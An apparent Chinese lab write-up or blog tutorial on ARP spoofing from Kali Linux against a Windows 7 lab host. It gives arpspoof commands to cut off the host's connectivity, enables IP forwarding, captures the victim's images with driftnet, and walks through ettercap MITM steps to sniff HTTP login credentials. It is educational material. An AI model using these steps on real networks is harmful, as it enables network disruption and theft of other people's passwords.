ARP欺骗

首先,打开Kali Linux终端,执行以下命令以安装必要的工具:

.                        

安装arpspoof(在ettercap-graphical中已包含):

.                        

.                        

sudo apt install ettercap-graphical

.                        

.                        

安装driftnet:

.                        

.                        

sudo apt install driftnet

.                        

.                        

IMG_256

.                        

安装完成后,确认网络接口名称,使用ifconfig命令查看。

IMG_257

IMG_258

ARP断网攻击

首先查看win7的上网情况

IMG_259

接着,执行以下命令进行ARP欺骗:

之后我们在kali的root模式下输入

arpspoof -i eth0(接口) -t 攻击主机目标地址 攻击主机目标网关

IMG_260

发现window7的网页已经上不出去了,我们就实现了断网的目的

ARP实现目标主机的截图获取

在kali上开启路由转发功能

1在kali的root模式下输入

echo 1 >> /proc/sys/net/ipv4/ip_forward  

之后回车并用cat命令查看是否修改成功
修改为1,我们就可以实现目标主机截图的下一个步骤

IMG_261

之后回车并用cat命令查看是否修改成功
修改为1,我们就可以实现目标主机截图的下一个步骤

.我们进行正向欺骗和反向欺骗

正向欺骗:arpspoof -i eth0 -t 目标主机IP地址 目标主机网关地址

反向欺骗: arpspoof -i eth0 -t 目标主机网关地址 目标主机IP地址

IMG_262

IMG_263

之后我们利用kali的driftnet进行截图获取

最后开启双向欺骗、路由转发功能后,利用ettercap嗅探win7所访问HTTP网站的账号密码。

.                   

安装ettercap:

.                   

如果尚未安装ettercap,请在Kali Linux终端中执行以下命令安装:

.                   

.                        

sudo apt update sudo apt install ettercap-graphical

.                        

.             

配置ettercap:

.             

打开ettercap图形界面,执行以下命令:

.             

这将打开ettercap的图形用户界面。然后按照以下步骤进行配置:

.             

.                                                选择网卡:在“Sniff”菜单中选择适当的网卡。

.                                                启用ARP poisoning:在“Mitm”菜单中选择“ARP poisoning”并选择“Sniff remote connections”。

.                                                添加目标:在“Hosts”菜单中选择“Scan for hosts”以扫描局域网上的主机,找到Win7的IP地址并将其添加为目标。

.                                                启用过滤器:在“Filters”菜单中选择“Load a filter”以加载HTTP过滤器。

.                        

sudo ettercap -G

.                        

.                   

启动MITM攻击:

.                   

返回到ettercap主界面,在“Mitm”菜单中选择“Start mitm attack”。

.                   

.                   

等待目标访问网站:

.                   

等待Win7访问目标HTTP网站(如计算机与软件学院实验报告系统),确保目标正在发送HTTP请求。

.                   

.                   

捕获账号密码:

.                   

在ettercap界面的“Hosts”菜单中,选择目标主机。然后,在“Mitm”菜单中选择“Start sniffing”,以开始捕获流量。在Win7输入账号密码时,ettercap将捕获并显示这些信息。

.                   

档铺网——在线文档免费处理

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安小趴菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值